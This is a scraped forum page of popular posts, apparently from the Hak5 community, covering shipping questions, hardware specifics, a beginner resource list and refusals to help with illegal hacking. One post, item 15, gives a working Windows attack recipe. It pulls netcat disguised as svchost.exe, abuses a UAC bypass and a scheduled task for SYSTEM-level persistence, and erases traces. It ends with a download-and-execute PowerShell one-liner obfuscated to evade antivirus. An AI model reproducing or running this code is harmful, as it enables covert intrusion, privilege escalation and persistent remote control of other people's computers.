Jump to content

Leaderboard


Popular Content

Showing content with the highest reputation since 04/13/2019 in all areas

  1. 2 points
    In short you asked for something that they are not let ship to your country, to be shipped via a reshipper. And it got caught. Legally, Hak5 owe you nothing. They shipped to the address you gave, in the US. That is where their duty of care ends. So you can ship it back the Hak5 and get a refund. That'd be it. Also to quote from https://shop.hak5.org/pages/policy#shipping
  2. 2 points
    It is a DC Type-M Barrel (OD:5.50mm, ID: 2.10mm, Center +).
  3. 1 point
    what firmware version are you using and the 100%cpu on the dashboard is fine. If you ssh to the pineapple and run top it wont show constant 100%cpu.
  4. 1 point
    No. Hacking in and of itself is just using something for a purpose it was not originally designed for. 99% of all your technology are because someone looked at something and said "What else can we make it do?" Some people are paid by companies to hack into them, to test their systems, that is called Penetration Testing. Some people hack at home, on their own equipment, to see what else they can make it do. And yes, some act illegally too.
  5. 1 point
    For all the people who are new at this whole “computer†thing and don’t really understand what hacking is all about and where to begin, I offer up these links to some great places to start learning. Please contribute to this thread and I will keep it up to date. Probably should be made sticky. News: www.digg.com www.slashdot.org Presentations: http://www.lessig.org/freeculture/free.html <-- A speech given talking all about the problems facing culture when dealing with copyright and other digital laws. Podcasts: http://www.grc.com/SecurityNow.htm <-- This is fantastic for people who are new to the field. If you have the time or motivation, go back and listen to them from day 1, they assume you know very little if anything and hit on all of the major topics in the security field. Fantastic show. IPTV Shows: http://www.binrev.com/ <-- Produce a good IPTV show and also have forums that are usually helpful. http://www.hak5.org <--- Duh.... Tutorial sites: http://www.remote-exploit.org <-- Pretty good resources, some very nice video tutorials on various exploits. Defiantly check out the tutorial section. http://www.irongeek.com/ <-- Excellent tutorials/information/articles. http://www.antionline.com/ <-- Tutorials, tools and forums full of helpful people. Programming Related: Teach Yourself C in 21 Days: http://neonatus.net/C/index.html Teach Yourself C++ in 21 Days: http://cma.zdnet.com/book/c++/ The Art of Assembly Language Programming: http://maven.smith.edu/~thiebaut/ArtOfAssembly/artofasm.html Microsoft Developers Network: http://msdn.microsoft.com ----Web Programming: HTML: http://www.w3schools.com PHP: http://www.php.net ASP.NET: http://www.asp.net/Default.aspx?tabindex=0&tabid=1 SQL: http://www.mysql.com Perl: http://www.perl.com/ Python: http://www.python.org Security Related: SecurityFocus: http://www.securityfocus.com/ Milw0rm: http://www.milw0rm.com SecurityForest: http://securityforest.com/wiki/index.php/Main_Page
  6. 1 point
    Sorry to say, it's only RJ45 Fast Ethernet. https://wifipineapple.com/pages/tetra
  7. 1 point
    I know it does python and node. If you want to compile a binary you can do so for arm architecture too. I recently found out I can compile go binaries for the BB.
  8. 1 point
  9. 1 point
    Contact the Hak5 shop but I doubt there is anything they can do to help. You should have checked the process before getting in to it.
  10. 1 point
    Depending on your contract with them, you may have no legal rights to what you created while working for them. Unless you have specific permission to come in after hours (which reading your post shows you do not), what you are proposing is illegal. We will not assist here.
  11. 1 point
    Hi, We noticed this issue while testing a forthcoming update, it has already been fixed and is pending release, likely within the next few days. Thank you!
  12. 1 point
    This was recorded a few days ago. https://www.youtube.com/watch?v=MPJs_mJULb0&t=57s
  13. 1 point
    I am having the exact same issues.
  14. 1 point
    Good luck with that. We're not going to help you hack your girlfriend's iPhone.
  15. 1 point
    Link to my original reddit post So how do we create such reverse shell? Well, first of all you need to download netcat 1.12 and extract the nc64.exe. Once you got it extracted upload it to some file-hosting service of your choice, which provides DIRECT LINK (very important!!). I used Discord, works like charm and link doesn't expire. Second, you need to make yourself an .XML file which you're gonna need later for Task Scheduler. I believe scheduled tasks are rly good way to set up persistence, as well as escelating the file that it executes to NT Authority\SYSTEM privileges, while remaining stealthy. I already did the work for you. This is what it should look like. Just modify the arguments in the bottom to your IP/PORT. Once you got that done, save it and upload it for DIRECT LINK, just like you uploaded your previous file. Now, that the boring setup part is over, we get to the actual code that's being executed to achieve this type of shell: cd $env:public $url1="YOUR_NC64_LINK" $url2="YOUR_XML_LINK" $path1="$env:public\svchost.exe" $path2="$env:public\x.xml" (new-object net.webclient).downloadfile($url1,$path1) (new-object net.webclient).downloadfile($url2,$path2) cmd /r 'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f&reg add "HKCU\Environment" /v "windir" /d "%comspec% /r mode 18,1&cd %public%&schtasks /create /tn \"Windows Update Assistant\" /f /xml x.xml >nul&schtasks /run /tn \"Windows Update Assistant\" /i >nul&REM "&timeout /t 1&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul&timeout /t 1&reg delete "HKCU\Environment" /v "windir" /F&attrib +s +h svchost.exe&del /q x.xml' So first, it downloads both of your files via powershell, then it clears our Windows + R history to clear any traces of itself (if you're using USB RubberDucky). Then it uses this UAC bypass technique to create scheduled task called Windows Update Assistant, which is set to be executed to run with NT Authority\SYSTEM privileges in our .XML file. Then it marks our nc64.exe file as hidden system file, which is also now called svchost.exe and then it deletes our .XML file, since system doesn't need it anymore after task is created. Now you're probably thinking, this is all nice, but how the fk do I run this in one-line of code? Very simple, by invoking expression called DownloadString in powershell like this: powershell -nop -w 1 -c "iex (new-object net.webclient).downloadstring('YOUR_PASTEBIN')" But problem with this one-liner is, that it gets picked up by most AVs as "malicious activity". Therefore, we need to obfuscate it a bit: cmd.exe /c powershell -nop -w 1 -c "iex (.('ne'+'w-ob'+'ject') ('ne'+'t.webc'+'lient')).('do'+'wnloadstr'+'ing').invoke(('Y'+'OUR_'+'PASTEBIN'))" And there it is, this one liner will get you persistent reverse shell which will check for itself every minute if it's running and if it's not, then it executes itself silently in the background.
  16. 1 point
    The business version will add the ability to logically differentiate by site, along with multiple logins for teams / collaboration. There is no limit to where devices may be deployed, however the stats on the home tab are aggregated from all devices in the site.
  17. 1 point
×
×
  • Create New...